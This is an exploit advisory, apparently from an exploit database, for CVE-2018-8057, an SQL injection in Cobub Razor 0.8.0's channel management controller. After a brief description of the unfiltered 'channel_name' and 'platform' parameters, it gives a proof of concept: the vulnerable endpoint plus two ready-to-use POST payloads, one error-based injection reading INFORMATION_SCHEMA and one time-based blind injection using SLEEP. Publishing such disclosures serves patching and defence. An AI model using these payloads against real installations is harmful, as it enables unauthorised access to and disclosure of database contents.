# Exploit Title:Cobub Razor 0.8.0 SQL injection Vulnerability# Date: 2018-04-16# Exploit Author: Kyhvedn(yinfengwuyueyi@163.com、kyhvedn@5ecurity.cn)# Vendor Homepage: http://www.cobub.com/# Software Link: https://github.com/cobub/razor# Version: 0.8.0# CVE : CVE-2018-8057
The string of the 'channel_name'and'platform' parameter transmission is completely without check andfilter,so if the string is passed, it will lead to the existence of SQL injection vulnerability,This could result in full information disclosure.
Code source:/application/controllers/manage/channel.php at line 75-95
The SQL injection type: error-based and AND/OR time-based blind
Parameter: channel_name,platform
PoC:
http://localhost/index.php?/manage/channel/addchannel
POST data:1.channel_name=test" AND (SELECT 1700 FROM(SELECT COUNT(*),CONCAT(0x7171706b71,(SELECT (ELT(1700=1700,1))),0x71786a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- JQon&platform=12.channel_name=test" AND SLEEP(5)-- NklJ&platform=1
